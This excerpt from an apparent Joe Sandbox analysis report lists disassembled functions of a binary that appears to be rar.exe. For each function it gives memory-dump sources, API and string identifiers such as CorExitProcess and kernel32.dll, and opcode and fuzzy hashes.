                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                            • Instruction ID: ede7ced57b9ed69b92e8542f07b1bc823a78225c277a1c854208bdc0ba0e8568
                                                            • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                            • Instruction Fuzzy Hash: 58313B72F18A51C9FB00DFB4D8901ACB771FB08799B54502ADE0E97A58EB38D499C710
                                                            Function 00007FF71D2EEB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: exe$rar$rebuilt.$sfx
                                                            • API String ID: 0-13699710
                                                            • Opcode ID: 8e3ebe7a8d66413e607fdcd4a757441faa1c7bec7dcda609089eab4bf309717e
                                                            • Instruction ID: c0db9e6e87fa74c7e87f067f4048f2b8a6792dd37261e52c9a3812035df79e9d
                                                            • Opcode Fuzzy Hash: 8e3ebe7a8d66413e607fdcd4a757441faa1c7bec7dcda609089eab4bf309717e
                                                            • Instruction Fuzzy Hash: 8A819831A0CE8285EA20FB25D4112F9A391FF897A4FC44535D96D176CAFE6DE60DCB20
                                                            Function 00007FF71D30E0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CurrentImageNonwritableUnwindabort
                                                            • String ID: csm$f
                                                            • API String ID: 3913153233-629598281
                                                            • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                            • Instruction ID: 4f9700873264c809865f7145eb8706c5c417e60a06aa60b8c83323a676fe3299
                                                            • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                            • Instruction Fuzzy Hash: 6761BE36B0DA42C6EB18FB15E440A79E795FB44BE4F948538DE1A17744EF38E8498B30
                                                            Function 00007FF71D2CEA18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Security$File$DescriptorLength
                                                            • String ID: $ACL
                                                            • API String ID: 2361174398-1852320022
                                                            • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                            • Instruction ID: 2a8a9d31519d9625086a7ad01e0fcfcff218190b1520ccc39ee52252f5ac0a62
                                                            • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                            • Instruction Fuzzy Hash: 7B315171A1DE8192E620EB11E4543EAE7A5FB88794FC04035DA9D43696FF3CE609CF50
                                                            Function 00007FF71D2B7188 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                            • String ID: CompareStringOrdinal$kernel32.dll
                                                            • API String ID: 2522007465-2120454788
                                                            • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                            • Instruction ID: 84e0d893cb0d8b15246af9b1cc1088bc69040eb99313969f9dc0cb7efd2ba7f3
                                                            • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                            • Instruction Fuzzy Hash: B7219431E0DF42C5EA14BB11A940174E291BF44BA0FD84139EA6D47694FFACE24D8B20
                                                            Function 00007FF71D2FBE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$swprintf$LocalSystem
                                                            • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                            • API String ID: 1364621626-1794493780
                                                            • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                            • Instruction ID: 46131f2a39616e24af89422804701942f69eb4a5270f5e0816d1ce4f1cfe44db
                                                            • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                            • Instruction Fuzzy Hash: EF21F976E186418EE760DF64D480A9DB7F0F748794F944436EE5893B48EB38E9498F20
                                                            Function 00007FF71D3124D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                            • Instruction ID: 6ff72bb0f853693850d9f18b4f0ed27ecbeb2970ea504098c57de6c97cb8602d
                                                            • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                            • Instruction Fuzzy Hash: CAF03175A1DE42C1EA45AB11F491279E361AF887A4F84103DEA4F46654FE3CD54C8A20
                                                            Function 00007FF71D31C654 Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                            • Instruction ID: f384bcfdcda129ee19b31e2d9f1b81fa2cf13ad646174824ce349cb183d19c4f
                                                            • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                            • Instruction Fuzzy Hash: A6A1B472B0CB83C6EB61AB6094503B9E691AF44BB4F984639DA5D067C5FF7CD44C8B20
                                                            Function 00007FF71D317AB4 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                            • Instruction ID: debe2996bda5a17badccd1bdb8f8748dfcef42eee1185f0e3671818f563fc3d5
                                                            • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                            • Instruction Fuzzy Hash: 018193B2E1CE13D5FB21AB6594806BDE6A0BB44B64F884139DD0E13795EF3C944ECB20
                                                            Function 00007FF71D317428 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 3659116390-0
                                                            • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                            • Instruction ID: 8cbe7ecc874a853a6efe7cb9e70719aab602fb1f4129297ff61a0c3c13544d4b
                                                            • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                            • Instruction Fuzzy Hash: BB51C672A18E52C6EB11DF65D4443ACFB70BB447A8F584139DE4E47698EF38D14ACB20
                                                            Function 00007FF71D2C80C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                            • String ID:
                                                            • API String ID: 643171463-0
                                                            • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                            • Instruction ID: e1a2936362b95ebb7f677710f780810eb64629e8c097ae0877d54a0c661a69b2
                                                            • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                            • Instruction Fuzzy Hash: E241D671E1CE4282E920BB21A9012B9E291AF45BB0F844339DE7D176D5FE7CE54DCB60
                                                            Function 00007FF71D3169B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                            • Instruction ID: af664cf9af3df472091cef9f68db4ebe0b4582d2452837198d490d300a5870dc
                                                            • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                            • Instruction Fuzzy Hash: A641C071B0DE02D1EA51AB86A800575E291BF08BB0F89853CDD5D4B784FE3CE00CDB60
                                                            Function 00007FF71D31DC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                            • Instruction ID: ac8fdba5e3a328785a178e77400ca04bd7d0ea566ebc4952aa27417034e5f03b
                                                            • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                            • Instruction Fuzzy Hash: AD118232E1CE0385F658312CF48A37AD1416F96370F845E3CE96E466D6FEACA4484A20
                                                            Function 00007FF71D2C7514 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
